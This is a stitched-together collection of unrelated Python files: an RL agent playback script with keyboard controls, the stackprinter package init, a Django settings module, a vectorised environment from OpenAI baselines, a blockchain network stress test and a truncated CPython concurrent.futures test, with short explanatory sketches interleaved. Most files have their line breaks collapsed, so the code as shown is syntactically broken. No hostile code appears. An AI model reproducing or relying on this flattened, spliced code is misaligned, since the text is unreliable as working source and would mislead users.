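FORMATTERS = {
    "m.msg":  lambda d: (d["author"], d["content"]),
    "u.join": lambda d: ("System", d["username"] + " has joined the server."),
}

def render(event):
    author, body = FORMATTERS[event["type"]](event["data"])
    stamp = datetime.fromtimestamp(event["ts"]).strftime("%H:%M")
    return "{} {} | {}".format(stamp, author, body)

if __name__ == "__main__":
    print(render({"type": "u.join", "data": {"username": "alice"}, "ts": 0}))
    print(render({"type": "m.msg",
                  "data": {"author": "bob", "content": "hello"}, "ts": 0}))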
enjoy_tmax.py
import random import sys import time from collections import deque from threading import Thread import cv2 import numpy as np from pynput.keyboard import Key, Listener, KeyCode from algorithms.utils.algo_utils import main_observation, goal_observation, EPS from algorithms.utils.env_wrappers import reset_with_info from algorithms.tmax.agent_tmax import AgentTMAX from algorithms.tmax.tmax_utils import parse_args_tmax, TmaxMode from algorithms.topological_maps.topological_map import TopologicalMap from utils.envs.atari import atari_utils from utils.envs.doom import doom_utils from utils.envs.envs import create_env from utils.timing import Timing from utils.utils import log, min_with_idx class PolicyType: RANDOM, AGENT, LOCOMOTION, PLAYER = range(4) KEY_CHARS = {RANDOM: 'r', AGENT: 'a', LOCOMOTION: 'l', PLAYER: 'p'} KEYS = {t: KeyCode.from_char(c) for t, c in KEY_CHARS.items()} persistent_map = None current_landmark = None pause = False terminate = False policy_type = PolicyType.AGENT current_actions = [] key_to_action = None # noinspection PyCallingNonCallable def on_press(key): if key == Key.esc: global terminate terminate = True return False global pause if key == Key.pause: pause = not pause global current_actions action = key_to_action(key) if action is not None: if action not in current_actions: current_actions.append(action) global policy_type for t, k in PolicyType.KEYS.items(): if key == k: policy_type = t log.info('Switch to policy %d (%r)', t, k) # noinspection PyCallingNonCallable def on_release(key): global current_actions action = key_to_action(key) if action is not None: if action in current_actions: current_actions.remove(action) last_distances = deque([], maxlen=200) def calc_distance_to_memory(agent, sparse_map, obs): distance_net = agent.curiosity.distance num_landmarks = sparse_map.num_landmarks() curr_obs = [obs] * num_landmarks map_obs = [sparse_map.get_observation(node) for node in sparse_map.graph.nodes] distances = distance_net.distances_from_obs( agent.session, obs_first=map_obs, obs_second=curr_obs, ) min_d, min_d_idx = min_with_idx(distances) global last_distances last_distances.append(min_d) # log.info('Avg.distance: %.3f', np.mean(last_distances)) log.info('Curr.distance: %.3f', min_d) import cv2 closest_node = list(sparse_map.graph.nodes)[min_d_idx] closest_obs = sparse_map.get_observation(closest_node) cv2.imshow('closest_obs', cv2.resize(cv2.cvtColor(closest_obs, cv2.COLOR_RGB2BGR), (420, 420))) cv2.waitKey(1) def calc_value_estimate(agent, obs): _, _, values = agent.actor_critic.invoke( agent.session, [obs], None, None, None, [1.0], ) value = values[0] log.info('Current value estimate is %.3f', value) def enjoy(params, env_id, max_num_episodes=1000, max_num_frames=None, show_automap=False): def make_env_func(): e = create_env(env_id, mode='test', show_automap=show_automap) e.seed(0) return e params = params.load() params.num_envs = 1 # during execution we're only using one env agent = AgentTMAX(make_env_func, params) env = make_env_func() agent.initialize() global persistent_map if agent.params.persistent_map_checkpoint is not None: persistent_map = TopologicalMap.create_empty() persistent_map.maybe_load_checkpoint(agent.params.persistent_map_checkpoint) global current_landmark episode_rewards = [] num_frames = 0 def max_frames_reached(frames): return max_num_frames is not None and frames > max_num_frames for _ in range(max_num_episodes): env_obs, info = reset_with_info(env) done = False obs, goal_obs = main_observation(env_obs), goal_observation(env_obs) 
prev_obs = obs if current_landmark is None: current_landmark = obs if goal_obs is not None: goal_obs_rgb = cv2.cvtColor(goal_obs, cv2.COLOR_BGR2RGB) cv2.imshow('goal', cv2.resize(goal_obs_rgb, (500, 500))) cv2.waitKey(500) episode_reward, episode_frames = 0, 0 if not agent.tmax_mgr.initialized: agent.tmax_mgr.initialize([obs], [info], env_steps=0) persistent_map = agent.tmax_mgr.dense_persistent_maps[-1] sparse_persistent_map = agent.tmax_mgr.sparse_persistent_maps[-1] log.debug('Num landmarks in sparse map: %d', sparse_persistent_map.num_landmarks()) agent.curiosity.initialized = True agent.tmax_mgr.mode[0] = TmaxMode.EXPLORATION agent.tmax_mgr.locomotion_final_targets[0] = None agent.tmax_mgr.locomotion_targets[0] = None start_episode = time.time() t = Timing() while not done and not terminate and not max_frames_reached(num_frames): with t.timeit('one_frame'): env.render() cv2.waitKey(1) # to prevent window from fading if pause: time.sleep(0.01) continue if len(current_actions) > 0: # key combinations are not handled, but this is purely for testing action = current_actions[-1] else: action = 0 if policy_type == PolicyType.PLAYER: pass elif policy_type == PolicyType.RANDOM: action = env.action_space.sample() elif policy_type == PolicyType.AGENT: agent.tmax_mgr.mode[0] = TmaxMode.EXPLORATION action, *_ = agent.policy_step([prev_obs], [obs], [goal_obs], None, None) action = action[0] elif policy_type == PolicyType.LOCOMOTION: agent.tmax_mgr.mode[0] = TmaxMode.LOCOMOTION action, _, _ = agent.loco_actor_critic.invoke( agent.session, [obs], [current_landmark], None, None, [1.0], ) action = action[0] env_obs, rew, done, info = env.step(action) next_obs, goal_obs = main_observation(env_obs), goal_observation(env_obs) _, _ = agent.tmax_mgr.update( [obs], [next_obs], [rew], [done], [info], num_frames, t, verbose=True, ) prev_obs = obs obs = next_obs calc_distance_to_memory(agent, sparse_persistent_map, obs) calc_value_estimate(agent, obs) episode_reward += rew num_frames += 1 episode_frames += 1 took_seconds = t.one_frame desired_fps = 15 # (4-repeated here, which means actually 60fps) wait_seconds = (1.0 / desired_fps) - took_seconds wait_seconds = max(0.0, wait_seconds) if wait_seconds > EPS: time.sleep(wait_seconds) env.render() log.info('Actual fps: %.1f', episode_frames / (time.time() - start_episode)) time.sleep(0.2) episode_rewards.append(episode_reward) last_episodes = episode_rewards[-100:] avg_reward = sum(last_episodes) / len(last_episodes) log.info( 'Episode reward: %f, avg reward for %d episodes: %f', episode_reward, len(last_episodes), avg_reward, ) if max_frames_reached(num_frames) or terminate: break agent.finalize() env.close() cv2.destroyAllWindows() return 0 def main(): args, params = parse_args_tmax(AgentTMAX.Params) env_id = args.env global key_to_action if 'dmlab' in env_id: from utils.envs.dmlab import play_dmlab key_to_action = play_dmlab.key_to_action elif 'atari' in env_id: key_to_action = atari_utils.key_to_action elif 'doom' in env_id: key_to_action = doom_utils.key_to_action else: raise Exception('Unknown env') try: show_map = args.show_automap except AttributeError: show_map = False # start keypress listener (to pause/resume execution or exit) def start_listener(): with Listener(on_press=on_press, on_release=on_release) as listener: listener.join() listener_thread = Thread(target=start_listener) listener_thread.start() status = enjoy(params, args.env, show_automap=show_map) log.debug('Press ESC to exit...') listener_thread.join() return status if __name__ == 
'__main__': sys.exit(main())
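# Illustrative sketch (hypothetical, standalone; not part of the file above).
# The main loop in enjoy() throttles itself to roughly 15 FPS: it measures how
# long one frame took and sleeps for whatever is left of the 1/fps budget.
# A standalone version of that pacing logic:
import time

def paced_loop(n_frames=30, desired_fps=15.0):
    budget = 1.0 / desired_fps
    start = time.time()
    for _ in range(n_frames):
        t0 = time.time()
        # ... one frame of work would go here ...
        elapsed = time.time() - t0
        time.sleep(max(0.0, budget - elapsed))
    print("actual fps: %.1f" % (n_frames / (time.time() - start)))

if __name__ == "__main__":
    paced_loop()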
__init__.py
import sys import types import warnings from threading import Thread from functools import wraps import stackprinter.formatting as fmt from stackprinter.tracing import TracePrinter, trace def _guess_thing(f): """ default to the current exception or current stack frame""" # the only reason this happens up here is to keep sys._getframe at the same # call depth relative to an invocation of `show` or `format`, even when # `format` is called _by_ `show`. @wraps(f) def show_or_format(thing=None, *args, **kwargs): if thing is None: thing = sys.exc_info() if thing == (None, None, None): thing = sys._getframe(1) return f(thing, *args, **kwargs) return show_or_format @_guess_thing def format(thing=None, **kwargs): """ Render the traceback of an exception or a frame's call stack Call this without arguments inside an `except` block to get a traceback for the currently handled exception: ``` try: something() except: logger.err(stackprinter.format(**kwargs)) ``` Explicitly pass an exception (or a triple as returned by `sys.exc_info()`) to handle that particular exception anywhere, also outside an except block. ``` try: something() except Exception as e: last_exc = e if last_exc: logger.err(stackprinter.format(last_exc, **kwargs)) ``` Pass a frame object to see the call stack leading up to that frame: ``` stack = stackprinter.format(sys._getframe(2), **kwargs)) ``` Pass a thread object to see its current call stack: ``` thread = threading.Thread(target=something) thread.start() # (...) stack = stackprinter.format(thread, **kwargs)) ``` Note: This displays variable values as they are _at the time of formatting_. In multi-threaded programs, variables can change while we're busy walking the stack & printing them. So, if nothing seems to make sense, consider that your exception and the traceback messages are from slightly different times. Sadly, there is no responsible way to freeze all other threads as soon as we want to inspect some thread's call stack (...or is there?) Params --- thing: (optional) exception, sys.exc_info() tuple, frame or thread What to format. Defaults to the currently handled exception or current stack frame. style: string 'plaintext' (default): Output just text 'darkbg', 'darkbg2', 'darkbg3', 'lightbg', 'lightbg2', 'lightbg3': Enable colors, for use in terminals that support 256 ansi colors or in jupyter notebooks (or even with `ansi2html`) source_lines: int or 'all' Select how much source code context will be shown. int 0: Don't include a source listing. int n > 0: Show n lines of code. (default: 5) string 'all': Show the whole scope of the frame. show_signature: bool (default True) Always include the function header in the source code listing. show_vals: str or None Select which variable values will be shown. 'line': Show only the variables on the highlighted line. 'like_source' (default): Show only those visible in the source listing 'all': Show every variable in the scope of the frame. None: Don't show any variable values. truncate_vals: int Maximum number of characters to be used for each variable value. Default: 500 line_wrap: int (default 60) Limit how many columns are available to print each variable (excluding its name). Set to 0 or False to disable wrapping. suppressed_paths: list of regex patterns Set less verbose formatting for frames whose code lives in certain paths (e.g. library code). Files whose path matches any of the given regex patterns will be considered boring. 
The first call to boring code is rendered with fewer code lines (but with argument values still visible), while deeper calls within boring code get a single line and no variable values. Example: To hide numpy internals from the traceback, set `suppressed_paths=[r"lib/python.*/site-packages/numpy"]` or `suppressed_paths=[re.compile(r"lib/python.*/site-packages/numpy")]` suppressed_exception_types: list of exception classes Show less verbose formatting for exceptions in this list. By default, this list is `[KeyboardInterrupt]`. Set to `[]` to force verbose formatting even on a keyboard interrupt. reverse: bool List the innermost frame first. add_summary: True, False, 'auto' Append a compact list of involved files and source lines, similar to the built-in traceback message. 'auto' (default): do that if the main traceback is longer than 50 lines. """ if isinstance(thing, types.FrameType): return fmt.format_stack_from_frame(thing, **kwargs) elif isinstance(thing, Thread): return format_thread(thing, **kwargs) elif isinstance(thing, Exception): exc_info = (thing.__class__, thing, thing.__traceback__) return format(exc_info, **kwargs) elif _is_exc_info(thing): return fmt.format_exc_info(*thing, **kwargs) else: raise ValueError("Can't format %s. "\ "Expected an exception instance, sys.exc_info() tuple,"\ "a frame or a thread object." % repr(thing)) @_guess_thing def show(thing=None, file='stderr', **kwargs): """ Print the traceback of an exception or a frame's call stack Params --- file: 'stderr', 'stdout' or file-like object defaults to stderr **kwargs: See `format` """ if file == 'stderr': file = sys.stderr elif file == 'stdout': file = sys.stdout print(format(thing, **kwargs), file=file) def format_current_stack(**kwargs): """ Render the current thread's call stack. Params -- **kwargs: See `format` """ return format(sys._getframe(1), **kwargs) def show_current_stack(**kwargs): """ Print the current thread's call stack. Params -- **kwargs: See `show` """ show(sys._getframe(1), **kwargs) def format_current_exception(**kwargs): """ Render a traceback for the currently handled exception. Params -- **kwargs: See `format` """ return format(sys.exc_info(), **kwargs) def show_current_exception(file=sys.stderr, **kwargs): """ Print a traceback for the currently handled exception. Params -- **kwargs: See `show` """ print(format_current_exception(**kwargs), file=file) def set_excepthook(**kwargs): """ Set sys.excepthook to print a detailed traceback for any uncaught exception. See `format()` for available kwargs. Examples: ---- Print to stdout instead of stderr: ``` set_excepthook(file='stdout') ``` Enable color output: ``` set_excepthook(style='darkbg') # or e.g. 'lightbg' (for more options see `format`) ``` If running under Ipython, this will, with a heavy heart, attempt to monkey patch Ipython's traceback printer (which handles all exceptions internally, thus bypassing the system excepthook). You can decide whether this sounds like a sane idea. To undo, call `remove_excepthook`. 
Params -- **kwargs: See `show` and `format` """ if _is_running_in_ipython(): _patch_ipython_excepthook(**kwargs) else: def hook(*args): show(args, **kwargs) sys.excepthook = hook def remove_excepthook(): """ Reinstate the default excepthook """ if _is_running_in_ipython(): _unpatch_ipython_excepthook() sys.excepthook = sys.__excepthook__ def _is_running_in_ipython(): try: return __IPYTHON__ except NameError: return False ipy_tb = None def _patch_ipython_excepthook(**kwargs): """ Replace ipython's built-in traceback printer, excellent though it is""" global ipy_tb blacklist = kwargs.get('suppressed_paths', []) blacklist.append('site-packages/IPython/') kwargs['suppressed_paths'] = blacklist if 'file' in kwargs: del kwargs['file'] def format_tb(*exc_tuple, **__): unstructured_tb = format(exc_tuple, **kwargs) structured_tb = [unstructured_tb] # \*coughs* return structured_tb import IPython shell = IPython.get_ipython() if ipy_tb is None: ipy_tb = shell.InteractiveTB.structured_traceback shell.InteractiveTB.structured_traceback = format_tb def _unpatch_ipython_excepthook(): """ restore proper order in Ipython """ import IPython shell = IPython.get_ipython() if ipy_tb is not None: shell.InteractiveTB.structured_traceback = ipy_tb def _is_exc_info(thing): if not isinstance(thing, tuple) or len(thing) != 3: return False a, b, c = thing return ((a is None or (isinstance(a, type) and BaseException in a.mro())) and (b is None or (isinstance(b, BaseException)))) def format_thread(thread, add_summary=False, **kwargs): try: fr = sys._current_frames()[thread.ident] except KeyError: return "%r: no frames found" % thread else: if 'suppressed_paths' not in kwargs: kwargs['suppressed_paths'] = [] kwargs['suppressed_paths'] += [r"lib/python.*/threading\.py"] msg = fmt.format_stack_from_frame(fr, **kwargs) msg_indented = ' ' + '\n '.join(msg.split('\n')).strip() return "%r\n\n%s" % (thread, msg_indented)
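# Illustrative sketch (hypothetical, standalone; not part of the file above).
# format_thread() resolves a Thread object to its current frame through
# sys._current_frames() (keyed by thread ident) and then formats that frame.
# The same lookup with only the stdlib traceback module:
import sys
import time
import traceback
from threading import Thread

def snapshot(thread):
    frame = sys._current_frames().get(thread.ident)
    if frame is None:
        return "%r: no frames found" % thread
    return "".join(traceback.format_stack(frame))

if __name__ == "__main__":
    t = Thread(target=time.sleep, args=(0.5,))
    t.start()
    time.sleep(0.1)     # give the thread a moment to enter sleep()
    print(snapshot(t))
    t.join()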
settings_20210906111205.py
""" Django settings for First_Wish project. Generated by 'django-admin startproject' using Django 3.2. For more information on this file, see https://docs.djangoproject.com/en/3.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.2/ref/settings/ """ from pathlib import Path import os import environ import threading import schedule import time from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails env_path = os.path.join(os.path.dirname(__file__), '../.env') environ.Env.read_env(env_path) # schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails) # ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS//////////////////// # Schedule the task at 00:01 everyday def sayHi(): print("Hi") schedule.every().day.at("11:13").do(sayHi) # schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise) def func(): while True: print("======Runnning==========") schedule.run_pending() time.sleep(1) t1 = threading.Thread(target=func) t1.start() # ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS//////////////////// # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent templates_path=os.path.join(BASE_DIR,'templates') # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'First_Wish_Main_App', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'First_Wish.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [templates_path], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'First_Wish.wsgi.application' # Database # https://docs.djangoproject.com/en/3.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } # Password validation # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, 
Images) # https://docs.djangoproject.com/en/3.2/howto/static-files/ STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATICFILES_DIRS = [ os.path.join(BASE_DIR, "static"), ]
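# Illustrative sketch (hypothetical, standalone; not part of the settings
# module above). The settings file starts a background thread at import time
# that calls schedule.run_pending() once per second so jobs registered with
# schedule.every().day.at(...) fire. The reduction below shows that pump loop
# on its own, with the thread marked as a daemon so it cannot keep the process
# alive on shutdown (the original thread is non-daemon).
import threading
import time

import schedule   # third-party dependency already used by the settings module

def tick():
    print("scheduled job ran")

schedule.every(1).seconds.do(tick)

def pump():
    while True:
        schedule.run_pending()
        time.sleep(1)

if __name__ == "__main__":
    threading.Thread(target=pump, daemon=True).start()
    time.sleep(3)   # let the job fire a few times, then exit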
multiprocessing_env.py
#This code is from openai baseline
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env

import numpy as np
from multiprocessing import Process, Pipe


def worker(remote, parent_remote, env_fn_wrapper):
    parent_remote.close()
    env = env_fn_wrapper.x()
    while True:
        cmd, data = remote.recv()
        if cmd == 'step':
            ob, reward, done, info = env.step(data)
            if done:
                ob = env.reset()
            remote.send((ob, reward, done, info))
        elif cmd == 'reset':
            ob = env.reset()
            remote.send(ob)
        elif cmd == 'reset_task':
            ob = env.reset_task()
            remote.send(ob)
        elif cmd == 'close':
            remote.close()
            break
        elif cmd == 'get_spaces':
            remote.send((env.observation_space, env.action_space))
        else:
            raise NotImplementedError


class VecEnv(object):
    """
    An abstract asynchronous, vectorized environment.
    """
    def __init__(self, num_envs, observation_space, action_space):
        self.num_envs = num_envs
        self.observation_space = observation_space
        self.action_space = action_space

    def reset(self):
        """
        Reset all the environments and return an array of observations, or a
        tuple of observation arrays. If step_async is still doing work, that
        work will be cancelled and step_wait() should not be called until
        step_async() is invoked again.
        """
        pass

    def step_async(self, actions):
        """
        Tell all the environments to start taking a step with the given
        actions. Call step_wait() to get the results of the step.
        You should not call this if a step_async run is already pending.
        """
        pass

    def step_wait(self):
        """
        Wait for the step taken with step_async().
        Returns (obs, rews, dones, infos):
         - obs: an array of observations, or a tuple of arrays of observations.
         - rews: an array of rewards
         - dones: an array of "episode done" booleans
         - infos: a sequence of info objects
        """
        pass

    def close(self):
        """
        Clean up the environments' resources.
        """
        pass

    def step(self, actions):
        self.step_async(actions)
        return self.step_wait()


class CloudpickleWrapper(object):
    """
    Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
    """
    def __init__(self, x):
        self.x = x

    def __getstate__(self):
        import cloudpickle
        return cloudpickle.dumps(self.x)

    def __setstate__(self, ob):
        import pickle
        self.x = pickle.loads(ob)


class SubprocVecEnv(VecEnv):
    def __init__(self, env_fns, spaces=None):
        """
        envs: list of gym environments to run in subprocesses
        """
        self.waiting = False
        self.closed = False
        nenvs = len(env_fns)
        self.nenvs = nenvs
        self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
        self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
                   for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
        for p in self.ps:
            p.daemon = True  # if the main process crashes, we should not cause things to hang
            p.start()
        for remote in self.work_remotes:
            remote.close()

        self.remotes[0].send(('get_spaces', None))
        observation_space, action_space = self.remotes[0].recv()
        VecEnv.__init__(self, len(env_fns), observation_space, action_space)

    def step_async(self, actions):
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        self.waiting = True

    def step_wait(self):
        results = [remote.recv() for remote in self.remotes]
        self.waiting = False
        obs, rews, dones, infos = zip(*results)
        return np.stack(obs), np.stack(rews), np.stack(dones), infos

    def reset(self):
        for remote in self.remotes:
            remote.send(('reset', None))
        return np.stack([remote.recv() for remote in self.remotes])

    def reset_task(self):
        for remote in self.remotes:
            remote.send(('reset_task', None))
        return np.stack([remote.recv() for remote in self.remotes])

    def close(self):
        if self.closed:
            return
        if self.waiting:
            for remote in self.remotes:
                remote.recv()
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()
        self.closed = True

    def __len__(self):
        return self.nenvs
p2p_stress.py
import testUtils import p2p_test_peers import random import time import copy import threading from core_symbol import CORE_SYMBOL class StressNetwork: speeds=[1,5,10,30,60,100,500] sec=10 maxthreads=100 trList=[] def maxIndex(self): return len(self.speeds) def randAcctName(self): s="" for i in range(12): s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345") return s def _transfer(self, node, acc1, acc2, amount, threadId, round): memo="%d %d" % (threadId, round) tr = node.transferFunds(acc1, acc2, amount, memo) self.trList.append(tr) def execute(self, cmdInd, node, ta, agrio): print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec)) total = self.speeds[cmdInd] * self.sec ta.name = self.randAcctName() acc1 = copy.copy(ta) print("creating new account %s" % (ta.name)) tr = node.createAccount(ta, agrio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True) trid = node.getTransId(tr) if trid is None: return ([], "", 0.0, "failed to create account") print("transaction id %s" % (trid)) ta.name = self.randAcctName() acc2 = copy.copy(ta) print("creating new account %s" % (ta.name)) tr = node.createAccount(ta, agrio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True) trid = node.getTransId(tr) if trid is None: return ([], "", 0.0, "failed to create account") print("transaction id %s" % (trid)) print("issue currency0000 into %s" % (acc1.name)) contract="agrio" action="issue" data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}" opts="--permission agrio@active" tr=node.pushMessage(contract, action, data, opts) trid = node.getTransId(tr[1]) if trid is None: return ([], "", 0.0, "failed to issue currency0000") print("transaction id %s" % (trid)) node.waitForTransInBlock(trid) self.trList = [] expBal = 0 nthreads=self.maxthreads if nthreads > self.speeds[cmdInd]: nthreads = self.speeds[cmdInd] cycle = int(total / nthreads) total = cycle * nthreads # rounding delay = 1.0 / self.speeds[cmdInd] * nthreads print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads)) t00 = time.time() for k in range(cycle): t0 = time.time() amount = 1 threadList = [] for m in range(nthreads): th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k)) th.start() threadList.append(th) for th in threadList: th.join() expBal = expBal + amount * nthreads t1 = time.time() if (t1-t0 < delay): time.sleep(delay - (t1-t0)) t11 = time.time() print("time used = %lf" % (t11 - t00)) actBal = node.getAccountBalance(acc2.name) print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal)) transIdlist = [] for tr in self.trList: trid = node.getTransId(tr) transIdlist.append(trid) node.waitForTransInBlock(trid) return (transIdlist, acc2.name, expBal, "") def on_exit(self): print("end of network stress tests")
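# Illustrative sketch (hypothetical, standalone; not part of the file above).
# StressNetwork.execute() converts a target transfer rate into thread batches:
# it caps the thread count, computes cycle = total // nthreads, and sleeps so
# each batch of nthreads transfers takes nthreads / rate seconds of wall
# clock. A dry run of that pacing arithmetic without any blockchain calls:
import threading
import time

def run_batches(total, rate, max_threads=100):
    nthreads = min(max_threads, rate)
    cycle = total // nthreads             # total is rounded, as in the original
    delay = (1.0 / rate) * nthreads       # wall-clock budget per batch
    done = []
    for k in range(cycle):
        t0 = time.time()
        batch = [threading.Thread(target=done.append, args=(k,))
                 for _ in range(nthreads)]
        for t in batch: t.start()
        for t in batch: t.join()
        time.sleep(max(0.0, delay - (time.time() - t0)))
    return len(done)

if __name__ == "__main__":
    print(run_batches(total=20, rate=10))   # 20 "transfers" at ~10/s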
test_concurrent_futures.py
from test import support # Skip tests if _multiprocessing wasn't built. support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. support.import_module('multiprocessing.synchronize') from test.support.script_helper import assert_python_ok import contextlib import itertools import logging from logging.handlers import QueueHandler import os import queue import sys import threading import time import unittest import weakref from pickle import PicklingError from concurrent import futures from concurrent.futures._base import ( PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor) from concurrent.futures.process import BrokenProcessPool from multiprocessing import get_context import multiprocessing.process import multiprocessing.util def create_future(state=PENDING, exception=None, result=None): f = Future() f._state = state f._exception = exception f._result = result return f PENDING_FUTURE = create_future(state=PENDING) RUNNING_FUTURE = create_future(state=RUNNING) CANCELLED_FUTURE = create_future(state=CANCELLED) CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED) EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError()) SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42) INITIALIZER_STATUS = 'uninitialized' def mul(x, y): return x * y def capture(*args, **kwargs): return args, kwargs def sleep_and_raise(t): time.sleep(t) raise Exception('this is an exception') def sleep_and_print(t, msg): time.sleep(t) print(msg) sys.stdout.flush() def init(x): global INITIALIZER_STATUS INITIALIZER_STATUS = x def get_init_status(): return INITIALIZER_STATUS def init_fail(log_queue=None): if log_queue is not None: logger = logging.getLogger('concurrent.futures') logger.addHandler(QueueHandler(log_queue)) logger.setLevel('CRITICAL') logger.propagate = False time.sleep(0.1) # let some futures be scheduled raise ValueError('error in initializer') class MyObject(object): def my_method(self): pass class EventfulGCObj(): def __init__(self, ctx): mgr = get_context(ctx).Manager() self.event = mgr.Event() def __del__(self): self.event.set() def make_dummy_object(_): return MyObject() class BaseTestCase(unittest.TestCase): def setUp(self): self._thread_key = support.threading_setup() def tearDown(self): support.reap_children() support.threading_cleanup(*self._thread_key) class ExecutorMixin: worker_count = 5 executor_kwargs = {} def setUp(self): super().setUp() self.t1 = time.monotonic() if hasattr(self, "ctx"): self.executor = self.executor_type( max_workers=self.worker_count, mp_context=self.get_context(), **self.executor_kwargs) else: self.executor = self.executor_type( max_workers=self.worker_count, **self.executor_kwargs) self._prime_executor() def tearDown(self): self.executor.shutdown(wait=True) self.executor = None dt = time.monotonic() - self.t1 if support.verbose: print("%.2fs" % dt, end=' ') self.assertLess(dt, 300, "synchronization issue: test lasted too long") super().tearDown() def get_context(self): return get_context(self.ctx) def _prime_executor(self): # Make sure that the executor is ready to do work before running the # tests. This should reduce the probability of timeouts in the tests. 
futures = [self.executor.submit(time.sleep, 0.1) for _ in range(self.worker_count)] for f in futures: f.result() class ThreadPoolMixin(ExecutorMixin): executor_type = futures.ThreadPoolExecutor class ProcessPoolForkMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "fork" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() class ProcessPoolSpawnMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "spawn" class ProcessPoolForkserverMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "forkserver" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() def create_executor_tests(mixin, bases=(BaseTestCase,), executor_mixins=(ThreadPoolMixin, ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)): def strip_mixin(name): if name.endswith(('Mixin', 'Tests')): return name[:-5] elif name.endswith('Test'): return name[:-4] else: return name for exe in executor_mixins: name = ("%s%sTest" % (strip_mixin(exe.__name__), strip_mixin(mixin.__name__))) cls = type(name, (mixin,) + (exe,) + bases, {}) globals()[name] = cls class InitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): global INITIALIZER_STATUS INITIALIZER_STATUS = 'uninitialized' self.executor_kwargs = dict(initializer=init, initargs=('initialized',)) super().setUp() def test_initializer(self): futures = [self.executor.submit(get_init_status) for _ in range(self.worker_count)] for f in futures: self.assertEqual(f.result(), 'initialized') class FailingInitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): if hasattr(self, "ctx"): # Pass a queue to redirect the child's logging output self.mp_context = self.get_context() self.log_queue = self.mp_context.Queue() self.executor_kwargs = dict(initializer=init_fail, initargs=(self.log_queue,)) else: # In a thread pool, the child shares our logging setup # (see _assert_logged()) self.mp_context = None self.log_queue = None self.executor_kwargs = dict(initializer=init_fail) super().setUp() def test_initializer(self): with self._assert_logged('ValueError: error in initializer'): try: future = self.executor.submit(get_init_status) except BrokenExecutor: # Perhaps the executor is already broken pass else: with self.assertRaises(BrokenExecutor): future.result() # At some point, the executor should break t1 = time.monotonic() while not self.executor._broken: if time.monotonic() - t1 > 5: self.fail("executor not broken after 5 s.") time.sleep(0.01) # ... 
